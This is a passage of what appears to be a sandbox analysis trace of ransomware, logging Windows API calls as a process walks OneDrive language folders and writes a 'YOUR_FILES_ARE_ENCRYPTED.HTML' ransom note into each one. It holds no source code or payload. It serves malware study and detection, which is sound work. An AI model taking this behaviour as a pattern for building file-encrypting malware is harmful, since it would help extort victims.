lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaa09b690, 
ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaa23e5b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaa23e5b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0160.556] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa23e5b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaa23e5b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaa23e5b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x126b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0160.556] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\gu\\FileSync.LocalizedResources.dll.mui") returned 110 [0160.556] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0160.556] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.556] lstrlenW (lpString=".mui") returned 4 [0160.556] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.556] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa23e5b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaa23e5b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaa23e5b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x126b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", 
cAlternateFileName="FILESY~1.MUI")) returned 0 [0160.556] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0160.556] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\gu\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0160.556] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\gu\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\gu\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5bc [0160.557] WriteFile (in: hFile=0x5bc, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0160.559] CloseHandle (hObject=0x5bc) returned 1 [0160.559] GetProcessHeap () returned 0x270000 [0160.560] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0160.560] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaa23e5b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaa4538f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaa4538f0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="ha-latn-ng", cAlternateFileName="HA-LAT~1")) returned 1 [0160.560] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ha-latn-ng") returned 82 [0160.560] GetProcessHeap () 
returned 0x270000 [0160.560] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0160.560] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ha-latn-ng" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ha-latn-ng") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ha-latn-ng" [0160.560] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ha-latn-ng", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ha-latn-ng\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ha-latn-ng\\*" [0160.560] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ha-latn-ng\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaa23e5b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaa4538f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaa4538f0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0160.561] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaa23e5b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaa4538f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaa4538f0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0160.561] FindNextFileW (in: 
hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa4538f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaa4538f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaa4538f0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x124b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0160.561] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ha-latn-ng\\FileSync.LocalizedResources.dll.mui") returned 118 [0160.561] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0160.561] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.562] lstrlenW (lpString=".mui") returned 4 [0160.562] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.562] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa4538f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaa4538f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaa4538f0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x124b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0160.562] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0160.562] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ha-latn-ng\\YOUR_FILES_ARE_ENCRYPTED.HTML") 
returned 112 [0160.562] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ha-latn-ng\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\ha-latn-ng\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5bc [0160.562] WriteFile (in: hFile=0x5bc, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0160.564] CloseHandle (hObject=0x5bc) returned 1 [0160.565] GetProcessHeap () returned 0x270000 [0160.565] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0160.565] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaa4538f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaa5f6810, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaa5f6810, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="he", cAlternateFileName="")) returned 1 [0160.565] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\he") returned 74 [0160.565] GetProcessHeap () returned 0x270000 [0160.565] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0160.565] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\he" | out: 
lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\he") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\he" [0160.565] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\he", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\he\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\he\\*" [0160.566] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\he\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaa4538f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaa5f6810, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaa5f6810, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0160.566] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaa4538f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaa5f6810, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaa5f6810, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0160.566] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa5f6810, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaa5f6810, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaa5f6810, 
ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x102a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0160.567] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\he\\FileSync.LocalizedResources.dll.mui") returned 110 [0160.567] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0160.567] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.567] lstrlenW (lpString=".mui") returned 4 [0160.567] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.567] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa5f6810, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaa5f6810, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaa5f6810, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x102a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0160.567] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0160.567] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\he\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0160.567] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\he\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\he\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, 
dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5bc [0160.568] WriteFile (in: hFile=0x5bc, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0160.570] CloseHandle (hObject=0x5bc) returned 1 [0160.570] GetProcessHeap () returned 0x270000 [0160.571] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0160.571] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaa5f6810, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaa799730, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaa799730, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="hi", cAlternateFileName="")) returned 1 [0160.571] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\hi") returned 74 [0160.571] GetProcessHeap () returned 0x270000 [0160.571] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0160.571] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\hi" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\hi") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\hi" [0160.571] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\hi", lpString2="\\*" | out: 
lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\hi\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\hi\\*" [0160.571] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\hi\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaa5f6810, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaa799730, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaa799730, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0161.433] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaa5f6810, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaa799730, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaa799730, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.434] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa799730, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaa799730, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaa799730, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x128b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0161.434] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: 
pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\hi\\FileSync.LocalizedResources.dll.mui") returned 110 [0161.434] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0161.434] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.434] lstrlenW (lpString=".mui") returned 4 [0161.434] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.434] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa799730, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaa799730, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaa799730, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x128b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0161.434] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0161.434] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\hi\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0161.434] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\hi\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\hi\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x594 [0161.435] WriteFile (in: hFile=0x594, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, 
lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0161.437] CloseHandle (hObject=0x594) returned 1 [0161.438] GetProcessHeap () returned 0x270000 [0161.438] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0161.439] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaa799730, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaa9fad30, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaa9fad30, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="hr", cAlternateFileName="")) returned 1 [0161.439] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\hr") returned 74 [0161.439] GetProcessHeap () returned 0x270000 [0161.439] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0161.439] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\hr" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\hr") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\hr" [0161.439] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\hr", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\hr\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\hr\\*" [0161.439] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\hr\\*", lpFindFileData=0x4ebcf24 | out: 
lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaa799730, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaa9fad30, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaa9fad30, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0161.552] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaa799730, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaa9fad30, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaa9fad30, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.552] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa9fad30, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaa9fad30, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaa9fad30, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12ea8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0161.552] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\hr\\FileSync.LocalizedResources.dll.mui") returned 110 [0161.552] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0161.552] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.552] lstrlenW (lpString=".mui") returned 4 
